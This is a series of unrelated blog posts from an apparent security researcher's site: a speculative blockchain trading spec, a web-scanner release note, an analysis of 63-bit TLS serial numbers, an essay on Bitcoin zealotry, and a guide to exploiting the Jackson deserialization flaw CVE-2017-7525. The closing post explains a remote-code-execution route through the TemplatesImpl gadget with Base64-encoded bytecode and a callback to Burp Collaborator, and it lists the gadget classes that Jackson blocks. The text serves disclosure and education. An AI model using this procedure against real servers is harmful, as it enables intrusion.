Insane Ideas: Blockchain-Based Automated Investment System

This is part of the Insane Ideas series. A group of blog posts that detail ideas, possible projects, or concepts that may be of interest. These are ideas that I don’t plan to pursue, and are thus available to any and all that would like to do something with them. I hope you find some inspiration – or at least some amusement in this.

A few months ago I was reading about high-frequency trading (HFT) – algorithms that allow investors to make money essentially out of nothing by executing trades at high speed, and leveraging the natural (and artificial) volatility of the market. While contemplating how HFT could be applied to a blockchain environment, I had an idea that I considered to be equal parts brilliant and insane (as described to a friend of mine):

A blockchain/smart contract based market; functioning similar to a stock market, but instead of holding shares in a company, you hold shares of a contract. Contracts will automatically trade in shares of other contracts to generate profit; contracts that perform well will have more demand, and thus be worth more.

Rules limit the maximum time a contract can hold shares and a requirement that a contract hold at least N% of its value in shares of other contracts will ensure constant trading activity. Each contract is essentially a HFT system trading against all the other contracts.

With the ability to trade options on other contracts, it would produce a very dynamic market that exists for the sole purpose of making money.

This is a market that is intended to be volatile, constantly changing, with new smart contracts being created and closed frequently. There would be immense pressure to create ever more sophisticated contracts that can outperform the competition. This rapid evolution would allow those that choose well to make a substantial profit. Of course, though that pick their investments poorly will find losses mounting up very quickly.

This is, simply put, crazy. It’s a very high risk / high reward system that is designed for investors that are willing to take substantial risks – though the upside could also be substantial.

This project became something of a thought experiment, and what follows is the start of a high-level specification for this system. This isn’t complete, though could have some value to someone – it has no value being unseen in my notes.

Please note: The following contains opinions on legal matters. I am not an attorney, nor is this legal advice. Please consult with an attorney should you decide to pursue a concept like this, as it’s highly likely that they will have many opinions that you should listen to.


This document describes a novel blockchain-based investment system, designed to provide a fair market using smart contracts that engage in automated trading. These smart contracts issue shares, allowing investors to profit from their performance.

The network uses a hybrid centralized-decentralized approach to ensure the level of performance needed to achieve the goals stated and rapid trading activity. Using a truly decentralized approach is likely not possible for a variety of reasons, though pursuing such a design would present some novel problems that are worthy of future research.


This document uses the following definitions throughout.

Coin – This is the “currency” of the system, used to purchase shares from contracts, and used by contracts to purchase shares of other contracts. Coin is issued by a special contract, and is a Network Token, no different than the tokens that represent shares of a contract.

Network Token – This is a token that represents value in the network, it may represent Coin, or shares of a contract. Each token includes the identification of the contract that it originates from.

Potential Legal / Tax Issues

Securities – It’s possible that the contract shares could be seen by the SEC as a security. This would need to be reviewed by an expert in this area of law to determine what compliance steps would be needed.

Capital Gains – The tax implications of this type of trading isn’t clear. This will need to be reviewed, to determine the tax implications of this design and how best to handle these issues.

Block Generator

The Block Generator is an elected system, from among the Block Signers, that will be responsible for collecting Commitments from the network, and producing a new block every blockGenerationTime seconds. The Commitments will be added to a block, and signed by the Block Generator, it will then send the new block to each of the Block Signers for their signatures. Each Block Signer will return their signature of the block. The Block Generator will then broadcast the new block to the network.

The Block Generator will only publish blocks that have at least blockMinimumSigners signatures, excluding its own. The Block Generator SHOULD publish a block as soon as it has received enough signatures to satisfy the blockMinimumSigners requirement.

Given the importance of quickly producing blocks to the system, the Block Generator should be a highly redundant system, resilient to common disruptions.

Block Generation Reward

Given the critical role that the Block Generator and the other Block Signers play, a reward is issued on the creation of each block. When a new block is created, the Coin Contract will mint new Coin, and distribute it evenly among those that signed the block, including the Block Generator.

No reward is generated for special purpose blocks.

Operating Fees

To ensure the continued health of the network, there are certain operating fees that are charged to each contract on a weekly basis. These fees are a percentage of the total value of the contract, and defined in the Network Parameters. These fees are:

Network Operator Fee – To cover the cost of operating and scaling the underlying network.

Coin Contract Operator Fee – To cover the administrative, security, and other costs of maintaining the contract configuration and protecting the assets held by the contract.

Founders Fee – This fee is paid to the founders of the network, to enable them to recover development costs, and continue to invest in improving the network.

These fees are payable via Coin or shares of the contract they are charged against. All contracts, other than the Coin Contract and Closed contracts must pay these fees. If multiple addresses are listed for any fee, the payment MUST be split evenly between these addresses.

Network Parameters

Multiple items in the investment contracts and other network components refer to agreed upon configuration items. These items will be retrieved from the most recent Network Parameters special block. This block will contain a single record containing a JSON document which defines all parameters needed for the network to function.

This values include:

  1. blockGenerationTime (in seconds)
  2. blockGenerator (public key & address, 1 item)
  3. blockSigners (public key & address, multiple items)
  4. blockMinimumSigners (int, must be less than blockSigners)
  5. blockProductionReward (int)
  6. contractMinimumSharePrice (int, in Coin)
  7. contractMaximumShareHoldTime (in seconds)
  8. contractMinimumShareHoldTime (in seconds)
  9. contractMaximumManagerFee (percentage of contract value, decimal)
  10. contractMaximumManagerShare (percentage of contract share, decimal)
  11. contractNetworkOperatorFee (percentage of contract value, decimal)
  12. contractNetworkOperatorFeeAddress (address list)
  13. contractFoundersFee (percentage of contract value, decimal)
  14. contractFoundersFeeAddress (address list)
  15. contractCoinContractOperatorFee (percentage of contract value, decimal)
  16. contractCoinContractOperatorFeeAddress (address list)

A new Network Parameters block may be generated by any Block Signer, and must be signed by blockMinimumSigners, excluding the Block Signer that generated the block. Should the Block Generator become unavailable, the Block Signers MUST elect a new Block Generator, and produce a new Network Parameters block.


All contracts are immutable, and may not be change, amended, or otherwise altered once they are created. While not allowing updates does complicate the situation should a vulnerability be discovered, it is the only way to ensure that a contract can not be updated in a way that would enable fraudulent activity once it has established value.

All contract code will be included in the special purpose block that creates the contract, making the source code public. Portions of the code, including the code that processes the New Block Action, may be encrypted using a key available to the Contract Execution Servers, provided that the Contract Manager provides a code review report from an approved security vendor to the public, and requests approval from operators of all Block Signers. The Block Signer operators may approve or reject the request at their discretion. Partially encrypted contracts are allowed to protect sensitive strategy information that may be critical to contract performance.

When a contract is created, it defines a certain number of shares, which it will initially own all of. It is not possible for a contract to issue additional shares, or to perform stock splits, or reverse splits. The number of existing shares is immutable.

Contracts have four states that they may exist in:

Active – Contract is live, and may engage in normal activity.

Restricted – A contract may be placed in a Restricted state, meaning that no activity is permitted. The New Block Action will not be executed, it will not be permitted to sell shares of itself, buy shares, or otherwise engage in normal trading. A contract may be Restricted, or have its state changed to Active by a special purpose block. The purpose of this state is to minimize risk should a vulnerability be discovered. In the Restricted state, the Contract Manager may opt to closing the contract, by changing its state to Closing.

Closing – When a contract state is changed to Closing, the contract will begin a shutdown process, liquidating its assets and halting its normal trading activity. Once a contract has been placed in Closing, it can not be changed back to Active. When the contract has liquidated all assets, holding only Coin and its own shares, it will move to the Closed status.

Closed – When a contract enters the Closed state, which is only possible by going through the Closing state, the contract will issue a Repurchase transaction for all outstanding shares, and cease all activity. The contract distributes all Coin it holds via the Repurchase; when completed, the will hold only shares of itself.

Closing A Contract

At the end of the life of a contract, the holder of the contracts private key SHALL trigger the contract to close. When a contract is closed, the following actions are taken:

  1. The contract stops all direct sales of its own shares, if any are remaining.
  2. The contract stops all purchases of shares using its own shares as the currency (Share Swapping).
  3. The contract stops all purchase using Coin as the currency.
  4. The contract sells shares in other contracts only for Coin.
  5. When all assets have been sold, the contract will issue a Repurchase transaction for all outstanding shares, calculating the price based on total Coin held divided by the number of outstanding shares.

Contract Execution

All contracts will be executed via Contract Execution Servers that are operated by the Network Operator.

Purchasing Contract Shares

Contract shares may be purchased via an exchange, or from the contract directly. Shares purchased from the contract have a minimum price of contractMinimumSharePrice per full share; this is to ensure that new contracts are able to gain adequate funding to operate.

Shares of a contract may be purchased either as full shares (1.0 share), or as a fractional share.

The Coin Contract

The Coin Contract is a special purpose contract that backs all Coin issued within the system. It acts as the value store backing Coin, receiving payments in cryptocurrencies, and returning new Coin in exchange. The Coin Contract will also repurchase Coin, transferring cryptocurrency for Coin received; Coin received via this system will be burned and removed from circulation.

The Coin Contract acts much like a regular contract from a functional perspective, except that it is the only contract that is able to produce new tokens beyond those created when the contract was created.

Coin is created via two mechanisms:

  1. Direct Purchase – When Coin is purchased from the Coin Contract via another currency, new Coin is produced.
  2. Block Generation Reward – When a new block is generated, new Coin is produced as a reward and to cover operations expense for the system operators.

The Coin Contract operator SHALL chose which cryptocurrencies are accepted, and which, if any, are thereafter converted to another cryptocurrency. The Coin Contract may not hold any reserves in Coin, or any other tokens from this network; all value must be stored in an outside value store.

The Coin Contract will use multiple sources of data, whenever possible, to determine the appropriate exchange rates.

Coin Contract Operator

As the Coin Contract holds value outside of the system, it must have an operator that is responsible for the security of its holdings, and updating its configuration. This operator should be a distinct legal entity, with oversight that is independent from the rest of the system.

The Coin Contract Operator SHOULD publish regular reports listing the status of the accounts held for the Coin Contract, and engage with a reputable auditor to provide assurance that the funds are secured.

The Coin Contract Operator SHOULD place funds in excess of what is needed for the Coin Contract to operate for 30 days with a fully independent custodian, such as a regulated financial institution.

Funds held for the Coin Contract MUST NOT be used for operating or other expenses by any party.

Contract Manager

The Contract Manager is the party that holds the private key for a contract, allowing them to update the contract’s configuration and change the state to Closing.

The Contract Manager MAY charge a fee against the contract, based on a percentage of total value, up to contractMaximumManagerFee. Any fee specified by the contract that exceeds contractMaximumManagerFee will be reduced to contractMaximumManagerFee.

Upon creation of a contract, the Contract Manager MAY receive shares automatically from the contract, based on a percentage of total shares, not to exceed contractMaximumManagerShare. The Contract Manager may purchase additional shares through the normal mechanism and at market rates.

Network Operator

The network operator is responsible for maintaining the components of the system that can not be decentralized while maintaining the level of performance required.

The Network Operator SHALL operate a number of Contract Execution Servers sufficient to process all contracts with minimal delay after a new block is broadcast.

The Network Operator SHALL operate a public exchange, with minimal fees, supported by the Network Operator Fee, to allow users to easily buy, sell, and trade Coin and contract shares.

The Network Operator SHALL employ reasonable security measures for all systems they operate for the network.

If the Network Operator also operates Block Signers, the number of Block Signers they operate MUST be less than 50% of blockMinimumSigners to minimize the risk that the Network Operator is able to perform fraudulent activity.

YAWAST v0.7 Released

It has now been over a year since the last major release of YAWAST, but today I am happy to release version 0.7, which is one of the largest changes to date. This is the result of substantial effort to ensure that YAWAST continues to be useful in the future, and add as much value as possible to those performing security testing of web applications.

If you are using the Gem version, simply run gem update yawast to get the latest version.

JSON Output

One of the headline features is that YAWAST now supports producing JSON output via the new --output=<file> parameter. This will create a JSON file that can be used to record the actions of YAWAST in more detail, and be used in reporting automation. The goal of this feature is to capture all of the information that is needed to produce a report automatically.

If you specify --output=. or --output=/path/., YAWAST will automatically generate a file name based on the domain name and current time.

The overall structure of the JSON output shouldn’t change, but the details included may change over time as the output is refined to make it as useful as possible.

Enhanced Vulnerability Scanner

The other major change in this version is the new vulnerability scanner, which adds a number of new checks, and opens the door to more easily adding checks in the future. This is currently accessed via the --vuln_scan parameter, as this is seen as a beta-level feature; when used without that parameter, YAWAST behaves as it has in the past. In the future, this will become of the default behavior, once it’s clear that it is stable.

It is recommended that you use --vuln_scan unless it is causing issues for you (and if it does cause issues, please open an issue).

One behavioral change is that the new --spider option works differently in each mode; --vuln_scan will always spider the site, so in that mode, --spider simply adds printed output to the UI listing the URLs found.

This new scanner leverages Chrome via an automated interface to perform certain tasks, that can only be properly tested by browser interaction; this adds some new dependencies, though the application should fail gracefully if these aren’t present.

The YAWAST Docker image has been updated to work with this new feature, making it the easiest way to use it.

User Enumeration via Password Reset Form (Timing & Response)

One new experimental feature that I would like to point out is that YAWAST will attempt to use the target application’s Password Reset Form (specified via --pass_reset_page) using Chrome automation to capture the difference between a valid user (specified via --user) and a randomly generated invalid user. It will compare the responses and display a diff of the changes between the two.

YAWAST will attempt to automatically identify the form field that captures the username / email address, if it fails to find the field, it will prompt you to provide the name or id.

It will run this procedure a total of 5 times, and capture of the timing that each request took, to determine if timing information can be used to determine valid users.

Change Log

Here is a list of the changes included in this version:

  • #38 – JSON Output Option via --output= (work in progress)
  • #133 – Include a Timestamp In Output
  • #134 – Add options to DNS command
  • #135 – Incomplete Certificate Chain Warning
  • #137 – Warn on TLS 1.0
  • #138 – Warn on Symantec Roots
  • #139 – Add Spider Option
  • #140 – Save output on cancel
  • #141 – Flag –internalssl as Deprecated
  • #147 – User Enumeration via Password Reset Form
  • #148 – Added --vuln_scan option to enable new vulnerability scanner
  • #151 – User Enumeration via Password Reset Form Timing Differences
  • #152 – Add check for 64bit TLS Cert Serial Numbers
  • #156 – Check for Rails CVE-2019-5418
  • #157 – Add check for Nginx Status Page
  • #158 – Add check for Tomcat RCE CVE-2019-0232
  • #161 – Add WordPress WP-JSON User Enumeration
  • #130 – Bug: HSTS Error leads to printing HTML
  • #132 – Bug: Typo in SSL Output
  • #142 – Bug: Error In Collecting DNS Information

TLS: 64bit-ish Serial Numbers & Mass Revocation

During a recent discussion about the DarkMatter CA on a Mozilla mailing list, it was found that their 64-bit serial numbers weren’t actually 64 bits, and it opened a can of worms. It turns out that the serial number was effectively 63 bits, which is a violation of the CA/B Forum Baseline Requirements that state it must contain 64 bits of output from a secure random number generator (CSPRNG). As a result of this finding, 2,000,000 certificates or more may need to be replaced by Google, Apple, GoDaddy and various others.

Update: GoDaddy initially said that more than 1.8 million of their certificates were impacted; they have drastically reduced this number in an update posted on 2019-03-12. The fully number of certificates impacted by this is still being discussed.

It’s quite likely that the full scope of this problem hasn’t been determined yet.

The Problem

During an analysis of certificates issued by DarkMatter, it was found that they all had a length of exactly 64 bits – not more, not less. If there’s a rule that requires 64 bits of CSPRNG output, and the serial number is always 64 bits, at first glance this seems fine. But, there’s a problem, and it’s in RFC 5280; it specifies the following:

The serial number MUST be a positive integer assigned by the CA to each certificate. It MUST be unique for each certificate issued by a given CA (i.e., the issuer name and serial number identify a unique certificate). CAs MUST force the serialNumber to be a non-negative integer.

Requiring a positive integer means that the high bit can’t be set – if it is set, it can’t be used directly as a certificate serial number. As such, if the high bit is set, there are two1 possible options:

  1. Pad the serial with an additional byte, so that the full 64 bits of output is used.
  2. Discard the value, and try again until you get a value without the high bit set. This means that the size is always 64 bits, and the high bit is always 0 – giving you 63 effective bits of output.

A popular software package for CAs, EJBCA had a default of using 64-bit serial numbers, and used the second strategy for dealing with CSPRNG output with the high bit set. This means that instead of using the full 64-bit output, it effectively reduced it to 63 bits – cutting the number of possible values in half. When we are talking about numbers this large, it’s easy to think that 1 bit wouldn’t make much difference, but the difference between 2^64 and 2^63 is substantial – to be specific, 2^63 is off by over 9 quintillion or more specifically 9,223,372,036,854,775,808.

The strategy of calling the CSPRNG until you get a value that has the high bit unset violates the intention of the rule imposed by the Baseline Requirements, meaning that all certificates issued using this method were mis-issued. This is a big deal, at least for a few CAs and their customers.

Now, the simple solution to this is to just increase the length of the serial beyond 64 bits; for CAs that used 72 or more bits of CSPRNG output, this is a non-issue, as even if they coerce the high bit, they are still well above the 64-bit minimum. This is a clear case of following a standard as close to the minimum as possible, which left no margin for error. As the holders of those 2+ million certificates are learning, they cut it too close.

The Rule

The Baseline Requirements are the minimum rules2 that all CAs must follow; these rules are voted on by a group of browser makers and CAs, and often debated in detail. Thankfully for all involved, much of these discussions happen on public mailing lists, so it’s easy to see what’s been discussed and what the view of the different parties were when a change was approved. This is a good thing when it comes to understanding this issue.

The relevant rule in this case is in section 7.1:

Effective September 30, 2016, CAs SHALL generate non-sequential Certificate serial numbers greater than zero (0) containing at least 64 bits of output from a CSPRNG.

On a prima facie reading of this requirement, it appears that the technique that EJBCA used could be valid – it is the output of a CSPRNG, and it is 64 bits. However, the Baseline Requirements can’t be read so simply, you have to look deeper to find the full intention. In this case, the fact that 1 bit would be lost in a purely random serial was pointed out by Ryan Sleevi of Google and Ben Wilson of DigiCert. This fact is not pointed out in the requirement itself, but is available to anyone that spends a few minutes looking at the history3 of the requirement.

With a deeper reading, it’s clear that a 64-bit serial, the smallest permitted, in quite likely to be a violation of the Baseline Requirements. While you can’t look at a single certificate to determine this, looking at a larger group will reveal if the certificate serial numbers are consistently 64 bits, in which case, there could be a problem.

Mass Revocation

When a certificate is issued that doesn’t meet the Baseline Requirements, the issuing CA is required to take quick action. Once again, the we look to the Baseline Requirements ( to find guidance:

The CA SHOULD revoke a certificate within 24 hours and MUST revoke a Certificate within 5 days if one or more of the following occurs: … 7. The CA is made aware that the Certificate was not issued in accordance with these Requirements or the CA’s Certificate Policy or Certification Practice Statement; …

This makes it clear that the CA has to revoke any certificate that wasn’t properly issued within 5 days. As a result, CAs are under pressure to address this issue as quickly as possible – replacing and revoking certificates with minimal delay to avoid missing this deadline. Google was able to revoke approximately 95% of their mis-issued certificates within the 5 days, Apple announced that they wouldn’t be able to complete the process within 5 days, and GoDaddy stated that they would need 30 days to complete the process. The same reason was cited by all three: minimizing impact. Without robust automation4, changing certificates can be complex and time-consuming, leaving the CA to choose between complying with requirements or impacting their customers.

Failing to comply with the Baseline Requirements will complicate audits, and could put a CA at risk of being removed from root stores.

The Impact

The full impact of this issue is far from known. For Google and Apple, both in the process of replacing their mis-issued certificates, they were only issued to their own organizations – reducing the impact. On the other hand GoDaddy, which has mis-issued more than 1.8 million certificates5, is facing a much larger problem as these were certificates issued to customers. Customers that are likely managing their certificates manually, and will require substantially longer to complete the process.

It’s also not clear how many other CAs may be impacted by this issue; while a few have come forward, I would be shocked if this is the full list. This is likely an issue that will live on for some time.

[Note on DarkMatter: This post is solely about the issue with serial numbers discovered as a result of the discussion around DarkMatter operating as a trusted CA in the Mozilla root store. It does not take any position on the issue of DarkMatter being deserving of such trust, which is left as an exercise for the reader.]

[Note on Exploitation Risk: Entropy in the serial number is required as a way to prevent hash collisions from being used to forge certificates; this requires an ability to predict or control certificate contents and the use of a flawed hashing algorithm, adding a random value makes this more difficult. This type of issue has been exploited with MD5, and could someday be exploited with SHA1; there’s no known flaws in the SHA2 family (used in all current end-entity certificates) that would allow such an attack. In addition, while due to this issue, the level of protection is reduced by half, 2^63 is still a large number and provides a substantial amount of safety margin.]

  1. There may be additional ways of handling this situation, though these are the most likely. Other methods may or may not actually be compliant with the Baseline Requirements. 
  2. Root store programs have their own rules which CAs must follow that go beyond the Baseline Requirements (BRs); as such, the BRs are not the final word in what is required, but a set of minimum requirements that all involved have agreed to. 
  3. Given the complex and sometimes adversarial nature of the CA/B Forum, even small and obvious changes are sometimes debated for extended periods. This makes updating the BRs more complex than it should be, and appears to drive changes to be as minimal as possible to avoid conflict. In an ideal world, CA/B Forum would produce an annotated version of the BRs that offer additional insight into the rules, their origins, and their intentions. In the world we live in, that would require a level of cooperation and coordination that is exceedingly unlikely. 
  4. With events like this, Heartbleed, and others that can lead to certificates being revoked with short notice, using robust automation to manage certificates is the only logical way forward. While this makes some people uncomfortable, manual management exposes organizations to far greater risk. 
  5. At the time of writing, these are preliminary numbers; the number of certificates that are being reissued is not clear. 

Bitcoin is a Cult

The Bitcoin community has changed greatly over the years; from technophiles that could explain a Merkle tree in their sleep, to speculators driven by the desire for a quick profit & blockchain startups seeking billion dollar valuations led by people who don’t even know what a Merkle tree is. As the years have gone on, a zealotry has been building around Bitcoin and other cryptocurrencies driven by people who see them as something far grander than they actually are; people who believe that normal (or fiat) currencies are becoming a thing of the past, and the cryptocurrencies will fundamentally change the world’s economy.

Every year, their ranks grow, and their perception of cryptocurrencies becomes more grandiose, even as novel uses of the technology brings it to its knees. While I’m a firm believer that a well designed cryptocurrency could ease the flow of money across borders, and provide a stable option in areas of mass inflation, the reality is that we aren’t there yet. In fact, it’s the substantial instability in value that allows speculators to make money. Those that preach that the US Dollar and Euro are on their deathbed have utterly abandoned an objective view of reality.

A little background…

I read the Bitcoin white-paper the day it was released – an interesting use of Merkle trees to create a public ledger and a fairly reasonable consensus protocol – it got the attention of many in the cryptography sphere for its novel properties. In the years since that paper was released, Bitcoin has become rather valuable, attracted many that see it as an investment, and a loyal (and vocal) following of people who think it’ll change everything. This discussion is about the latter.

Yesterday, someone on Twitter posted the hash of a recent Bitcoin block, the thousands of Tweets and other conversations that followed have convinced me that Bitcoin has crossed the line into true cult territory.

It all started with this Tweet by Mark Wilcox:

The value posted is the hash of Bitcoin block #528249. The leading zeros are a result of the mining process; to mine a block you combine the contents of the block with a nonce (and other data), hash it, and it has to have at least a certain number of leading zeros to be considered valid. If it doesn’t have the correct number, you change the nonce and try again. Repeat this until the number of leading zeros is the right number, and you now have a valid block. The part that people got excited about is what follows, 21e800.

Some are claiming this is an intentional reference, that whoever mined this block actually went well beyond the current difficulty to not just bruteforce the leading zeros, but also the next 24 bits – which would require some serious computing power. If someone had the ability to bruteforce this, it could indicate something rather serious, such as a substantial breakthrough in computing or cryptography.

You must be asking yourself, what’s so important about 21e800 – a question you would surely regret. Some are claiming it’s a reference to E8 Theory (a widely criticized paper that presents a standard field theory), or to the 21,000,000 total Bitcoins that will eventually exist (despite the fact that 21 x 10^8 would be 2,100,000,000). There are others, they are just too crazy to write about. Another important fact is that a block is mined on average on once a year that has 21e8 following the leading zeros – those were never seen as anything important.

This leads to where things get fun: the theories that are circulating about how this happened.

  • A quantum computer, that is somehow able to hash at unbelievable speed. This is despite the fact that there’s no indication in theories around quantum computers that they’ll be able to do this; hashing is one thing that’s considered safe from quantum computers.
  • Time travel. Yes, people are actually saying that someone came back from the future to mine this block. I think this is crazy enough that I don’t need to get into why this is wrong.
  • Satoshi Nakamoto is back. Despite the fact that there has been no activity with his private keys, some theorize that he has returned, and is somehow able to do things that nobody can. These theories don’t explain how he could do it.

If all this sounds like numerology to you, you aren’t alone.

All this discussion around special meaning in block hashes also reignited the discussion around something that is, at least somewhat, interesting. The Bitcoin genesis block, the first bitcoin block, does have an unusual property: the early Bitcoin blocks required that the first 32 bits of the hash be zero; however the genesis block had 43 leading zero bits. As the code that produced the genesis block was never released, it’s not known how it was produced, nor is it known what type of hardware was used to produce it. Satoshi had an academic background, so may have had access to more substantial computing power than was common at the time via a university. At this point, the oddities of the genesis block are a historical curiosity, nothing more.

A brief digression on hashing

This hullabaloo started with the hash of a Bitcoin block; so it’s important to understand just what a hash is, and understand one very important property they have. A hash is a one-way cryptographic function that creates a pseudo-random output based on the data that it’s given.

What this means, for the purposes of this discussion, is that for each input you get a random output. Random numbers have a way of sometimes looking interesting, simply as a result of being random and the human brain’s affinity to find order in everything. When you start looking for order in random data, you find interesting things – that are yet meaningless, as it’s simply random. When people ascribe significant meaning to random data, it tells you far more about the mindset of those involved rather than the data itself.

Cult of the Coin

First, let us define a couple of terms:

  • Cult: a system of religious veneration and devotion directed toward a particular figure or object.
  • Religion: a pursuit or interest to which someone ascribes supreme importance.

The Cult of the Coin has many saints, perhaps none greater than Satoshi Nakamoto, the pseudonym used by the person(s) that created Bitcoin. Vigorously defended, ascribed with ability and understanding far above that of a normal researcher, seen as a visionary beyond compare that is leading the world to a new economic order. When combined with Satoshi’s secretive nature and unknown true identify, adherents to the Cult view Satoshi as a truly venerated figure.

That is, of course, with the exception of adherents that follow a different saint, who is unquestionably correct, and any criticism is seen as not only an attack on their saint, but on themselves as well. Those that follow EOS for example, may see Satoshi has a hack that developed a failed project, yet will react fiercely to the slightest criticism of EOS, a reaction so strong that it’s reserved only for an attack on one’s deity. Those that follow IOTA react with equal fierceness; and there are many others.

These adherents have abandoned objectivity and reasonable discourse, and allowed their zealotry to cloud their vision. Any discussion of these projects and the people behind them that doesn’t include glowing praise inevitably ends with a level of vitriolic speech that is beyond reason for a discussion of technology.

This is dangerous, for many reasons:

  • Developers & researchers are blinded to flaws. Due to the vast quantities of praise by adherents, those involved develop a grandiose view of their own abilities, and begin to view criticism as unjustified attacks – as they couldn’t possibly have been wrong.
  • Real problems are attacked. Instead of technical issues being seen as problems to be solved and opportunities to improve, they are seen as attacks from people who must be motivated to destroy the project.
  • One coin to rule them all. Adherents are often aligned to one, and only one, saint. Acknowledging the qualities of another project means acceptance of flaws or deficiencies in their own, which they will not do.
  • Preventing real progress. Evolution is brutal, it requires death, it requires projects to fail and that the reasons for those failures to be acknowledged. If lessons from failure are ignored, if things that should die aren’t allowed to, progress stalls.

Discussions around many of the cryptocurrencies and related blockchain projects are becoming more and more toxic, becoming impossible for well-intentioned people to have real technical discussions without being attacked. With discussions of real flaws, flaws that would doom a design in any other environment, being instantly treated as heretical without any analysis to determine the factual claims becoming routine, the cost for the well-intentioned to get involved has become extremely high. There are at least some that are aware of significant security flaws that have opted to remain silent due to the highly toxic environment.

What was once driven by curiosity, a desire to learn and improve, to determine the viability of ideas, is now driven by blind greed, religious zealotry, self-righteousness, and self-aggrandizement.

I have precious little hope for the future of projects that inspire this type of zealotry, and its continuous spread will likely harm real research in this area for many years to come. These are technical projects, some projects succeed, some fail – this is how technology evolves. Those designing these systems are human, just as flawed as the rest of us, and so too are the projects flawed. Some are well suited to certain use cases and not others, some aren’t suited to any use case, none yet are suited to all. The discussions about these projects should be focused on the technical aspects, and done so to evolve this field of research; adding a religious to these projects harms all.

[Note: There are many examples of this behavior that could be cited, however in the interest of protecting those that have been targeted for criticizing projects, I have opted to minimize such examples. I have seen too many people who I respect, too many that I consider friends, being viciously attacked – I have no desire to draw attention to those attacks, and risk restarting them.]

Exploiting the Jackson RCE: CVE-2017-7525

Earlier this year, a vulnerability was discovered in the Jackson data-binding library, a library for Java that allows developers to easily serialize Java objects to JSON and vice versa, that allowed an attacker to exploit deserialization to achieve Remote Code Execution on the server. This vulnerability didn’t seem to get much attention, and even less documentation. Given that this is an easily exploited Remote Code Execution vulnerability with little documentation, I’m sharing my notes on it.

What To Look For

There are a couple of ways to use Jackson, the simplest, and likely most common, is to perform a binding to a single object, pulling the values from the JSON and setting the properties on the associated Java object. This is simple, straightforward, and likely not exploitable. Here’s a sample of what that type of document looks like:

What we are interested in, is a bit different – in some cases1 you are create arbitrary objects, and you will see their class name in the JSON document. If you see this, it should raise an immediate red flag. Here’s a sample of what these look like:

To determine if this really is Jackson that you are seeing, one technique is (if detailed error messages are available) to provide invalid input and look for references to either of these:

  • com.fasterxml.jackson.databind

Building An Exploit

The ability to create arbitrary objects though, does come with some limitations: the most important of which is that Jackson requires a default constructor (no arguments), so some things that seem like obvious choices (i.e. java.lang.ProcessBuilder) aren’t an option. There are some suggestions on techniques in the paper from Moritz Bechler, though the technique pushed in the paper is interesting (the focus is on loading remote objects from another server), it didn’t meet my needs. There are other, simple options available.

Helpfully, the project gave us a starting point to build an effective exploit in one of their unit tests:

This code leverages a well-known ‘gadget’ to create an object that will accept a compile Java object (via transletBytecodes) and execute it as soon as outputProperties is accessed. This creates a very simple, straightforward technique to exploit this vulnerability.

We can supply a payload to this to prove that we have execution, and we are done.

Building The Payload

In this case, the goal is to prove that we have execution, and the route I went is to have the server issue a GET request to Burp Collaborator. This can be done easily with the following sample code:

This code can be compiled with the javac compiler, and then the resulting .class file should be Base64 encoded, and provided to the transletBytecodes field in the JSON document. As soon as the document is processed, it will create the object, load the code, and execute it. You may still see errors from code failing after the code executes, such as from type-mismatches or the like.

Limiting Attack Surface

This is just one technique to exploit this flaw, there are many others available. To mitigate the issue, at least in part, Jackson has been modified with a blacklist of types known to be useful gadgets for this type of attack:

  • org.apache.commons.collections.functors.InvokerTransformer
  • org.apache.commons.collections.functors.InstantiateTransformer
  • org.apache.commons.collections4.functors.InvokerTransformer
  • org.apache.commons.collections4.functors.InstantiateTransformer
  • org.codehaus.groovy.runtime.ConvertedClosure
  • org.codehaus.groovy.runtime.MethodClosure
  • org.springframework.beans.factory.ObjectFactory
  • org.apache.xalan.xsltc.trax.TemplatesImpl
  • com.sun.rowset.JdbcRowSetImpl
  • java.util.logging.FileHandler
  • java.rmi.server.UnicastRemoteObject
  • org.springframework.beans.factory.config.PropertyPathFactoryBean
  • com.mchange.v2.c3p0.JndiRefForwardingDataSource
  • com.mchange.v2.c3p0.WrapperConnectionPoolDataSource

There are likely others that can be used in similar ways to gain code execution that haven’t become well-known yet, so this doesn’t eliminate the problem, it just makes it less likely.

Required Reading & References

To fully understand this vulnerability, there are a few things that you should read:

  1. To exploit this issue, the user of the library must have enabled Default Typing (mapper.enableDefaultTyping), if this hasn’t been done, then the exploit here doesn’t work, as you aren’t able to create arbitrary objects.